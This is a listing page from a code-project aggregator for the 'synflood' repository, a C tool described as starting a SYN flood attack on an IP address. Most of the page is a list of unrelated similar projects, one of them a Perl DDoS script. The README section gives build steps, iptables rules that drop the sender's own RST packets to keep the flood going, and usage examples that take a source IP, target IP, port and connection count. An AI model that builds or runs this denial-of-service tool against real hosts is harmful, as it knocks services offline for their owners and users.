All Projects β†’ TheFox β†’ synflood

TheFox / synflood

Licence: MIT license
Start a SYN flood attack to an ip address.

Programming Languages

c
50402 projects - #5 most used programming language
CMake
9771 projects

Projects that are alternatives of or similar to synflood

PHP-File-Cache
Light, simple and standalone PHP in-file caching class
Stars: ✭ 34 (+25.93%)
Mutual labels:  mit-license
pixelpwnr-server
πŸŽ† Blazingly fast GPU accelerated pixelflut server written in Rust.
Stars: ✭ 43 (+59.26%)
Mutual labels:  flood
brush
An amazing scaffolding for developing database-driven websites, applications and APIs. Built on Laravel Lumen Framework, MySQL and Angular.
Stars: ✭ 23 (-14.81%)
Mutual labels:  mit-license
JNAPushPopCompletionBlock
Completion Block for UINavigationController Push/Pop UIViewController
Stars: ✭ 40 (+48.15%)
Mutual labels:  mit-license
lexer
Hackable Lexer with UTF-8 support
Stars: ✭ 19 (-29.63%)
Mutual labels:  mit-license
twenty-twenty-hugo
Twenty Twenty Hugo is forked from WordPress Twenty Twenty theme. It's fully functional like the WordPress theme.
Stars: ✭ 48 (+77.78%)
Mutual labels:  mit-license
lidtk
Language Identification Toolkit
Stars: ✭ 17 (-37.04%)
Mutual labels:  mit-license
polylogarithm
Implementation of various polylogarithms
Stars: ✭ 17 (-37.04%)
Mutual labels:  mit-license
shepherd
Ensure high-availability for your JSON-RPC calls while improving user-experience
Stars: ✭ 40 (+48.15%)
Mutual labels:  mit-license
magento-grid-colors
Magento 2 Grid Colors module for colorizing admin grids. Supports saving of states with the help of grid's bookmarks.
Stars: ✭ 54 (+100%)
Mutual labels:  mit-license
DDoS-Script
A script written in perl for ddos ​​with automatic detection of open and vulnerable port that gives up to 1.5 gb packages / s
Stars: ✭ 30 (+11.11%)
Mutual labels:  flood
silencebot
Silence Bot for your Telegram supergroups
Stars: ✭ 19 (-29.63%)
Mutual labels:  flood
liva-hugo
Liva is a personal blog template powered by Hugo.
Stars: ✭ 192 (+611.11%)
Mutual labels:  mit-license
MyBatisGenerator-Tool
πŸ”§ A tool which aims to generate code by using MyBatis Generator with Gradle in IntelliJ IDEA.
Stars: ✭ 20 (-25.93%)
Mutual labels:  mit-license
lisflood-code
Lisflood OS - LISFLOOD
Stars: ✭ 62 (+129.63%)
Mutual labels:  flood
ParsecSoda
Parsec Soda is a custom open-source game streaming app that integrates with Parsec API and is focused in Host experience.
Stars: ✭ 135 (+400%)
Mutual labels:  mit-license
janusweb
An in-browser implementation of JanusVR
Stars: ✭ 145 (+437.04%)
Mutual labels:  mit-license
HacktoberFest2021
Beginner-friendly repository for Hacktober Fest 2021. Start your contribution to open source through baby steps. πŸ’œ
Stars: ✭ 33 (+22.22%)
Mutual labels:  mit-license
Cold-Family-Feud
Host your own Family Feud game. Mobile friendly with built in buzzers.
Stars: ✭ 30 (+11.11%)
Mutual labels:  mit-license
pixelpwnr
πŸŽ† Insanely fast pixelflut client for images and animations written in Rust.
Stars: ✭ 50 (+85.19%)
Mutual labels:  flood

SynFlood

Start a SYN flood attack to an ip address.

Requirements

  • libnet1. libnet1-dev under Debian.

  • Root access for sending a packet.

  • Its recommended to block all RST packets from the source host on the source host.

     iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST RST -j DROP
     iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST ACK -j DROP

Build

  1. Clone:

    git clone https://github.com/TheFox/synflood.git
  2. In synflood directory, make:

    mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=Release .. && make && make test
  3. Done.

Usage

./synflood SRC DST DPT [CONNECTIONS]
  • SRC: Source IP address.
  • DST: Destination IP address.
  • DPT: Destination port.
  • CONNECTIONS: Number of connections.

Examples:

./synflood 192.168.241.31 192.168.1.3 80
./synflood 192.168.241.31 192.168.1.3 80 1000
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].